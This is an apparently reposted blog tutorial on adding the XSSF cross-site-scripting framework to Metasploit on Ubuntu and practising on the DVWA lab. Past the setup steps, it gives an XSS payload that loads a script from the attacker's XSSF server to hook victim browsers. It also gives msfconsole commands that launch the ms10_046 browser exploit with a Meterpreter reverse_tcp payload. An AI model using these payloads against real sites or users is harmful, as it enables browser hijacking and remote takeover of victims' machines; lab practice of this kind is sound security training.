A-A+

Add XSSF to Metasploit Framework on Ubuntu

2015年04月16日 未分类 暂无评论 阅读 1 次

 

  • What is XSSF or the Cross-site Scripting Framework?

    The XSS Framework (XSSF) is able to manage victims of a generic XSS attack and hold an existing connection with JavaScript loop refreshing in order to allow future browser-based attacks.  After injection of the generic attack (resource “loop” generated by XSSF), each victim will ask the attack server (every “x” seconds) if new commands are available:

    The advantage of having the project built within the Metasploit Framework is the ability to run browser exploits already included in MSF. Unlike the existing projects (BeEF, XeeK, XSSShell/XSSTunnel), XSSF gives the possibility to simply add and run attacks (using MSF modules), and execute already existing MSF exploits without installing third-party solutions.  MSF uses Ruby scripts to create a server listeners that wait for exploited browsers to connect.  In addition, the ability to create XSS tunnels with targeted victims is a real advantage.

    Video showing how XSSF works in MetaSploit

    Video showing how XSSF Tunnel works

     

     

    Setting up XSSF Framework for Metasploit on Ubuntu 10.10

     

    Download http://www.metasploit.com/redmine/attachments/596/XSSF.zip

     

    UNZIP and copy files into metasploit /msf3 directory

    cp -iR /home/user/Downloads/XSSF/data/ <space> /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/lib/ <space> /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/modules/ <space> /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/plugins/ <space> /opt/metasploit3/msf3/

     

    RENAME XSSF.rb ruby script (it is wrong in zip file)

    mv /opt/metasploit3/msf3/plugins/XSSF.rb    <space> /opt/metasploit3/msf3/plugins/xssf.rb

     

    INSTALL MySQL IF NOT ALREADY INSTALLED

    Install MySQL with Synaptic or apt-get

    $ sudo apt-get install mysql-server mysql-client
    $ sudo apt-get install libmysql-ruby libmysqlclient-dev

     

    FIX MySQL ERROR: The database backend has not been initialized …

    gem install mysql

    (needed for XSSF to use MySQL driver)

     

     

    FIX RUBY ERRORS DURING START OF METASPLOIT (UPGRADE RUBY TO 1.9.1)

    apt-get install ruby1.9.1-full
    mv /usr/bin/ruby <space> ruby1.8_symlink
    cp -s ruby1.9.1 <space> ruby (-s to create a symbolic link to ruby version 1.9.1)

    SET GEM VERSION TO 1.9.1
    mv gem gem1.8_symlink
    cp -s gem1.9.1 <space> gem (-s to create a symbolic link to gem version 1.9.1)

    NOW YOU NEED A SITE WITH XSS VULNERABILITY EXPLOIT:

    Damn Vulnerable Web App LIVE CD

     

    EXPLOIT: On DVWA as a Reflective or Stored Cross-site Scripting attack

    http://server_ipaddress/?lang=”><script src=”http://xssf_ipaddress:8888/loop?interval=2″></script>

    OR THIS INTO SUBMIT FIELD ON PAGE
    “><script src=”http://xssf_ipaddres:8888/loop?interval=2″></script>

    you will see the victim page refresh every 2 secs

     

    START METASPLOIT

    $ /opt/metasploit3/msf3/msfconsole

    msf> svn update (to get latest exploits, plugins, modules)

     

    CONNECT METASPLOIT TO MYSQL DATABASE

    msf> db_driver mysql
    msf> db_connect user:pass@127.0.0.1:3306/msf3

    (use same pass as when you setup the mysql database above)

     

    USING METASPLOIT (XSSF):

    LOAD METASPLOIT XSSF AND TYPE
    msf> load XSSF (case-sensitive)

     

    Please run ‘http://ipaddress:8888/loop’ into any browser with JavaScript enabled

    msf> xssf_victims (note victim 1)
    msf> xssf_information 1
    msf> use auxiliary/xssf/alert
    msf> set AlertMessage XSS pop-up will appear
    msf> run

    USING METASPLOIT XSSF AUXILLARY MODULES:

    EXPLOIT BROWSER VIA XSSF WITH VULNERABILITY OF CHOICE

    msf> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    msf> set PAYLOAD windows/meterpreter/reverse_tcp
    msf> set LHOST 192.168.1.82
    msf> exploit
    msf> jobs
    msf> xssf_exploit 1 0

- See more at: http://securitystreetknowledge.com/?p=445#sthash.bADoO9wY.dpuf

 

给我留言

Copyright © 浩然东方 保留所有权利.   Theme  Ality 07032740

用户登录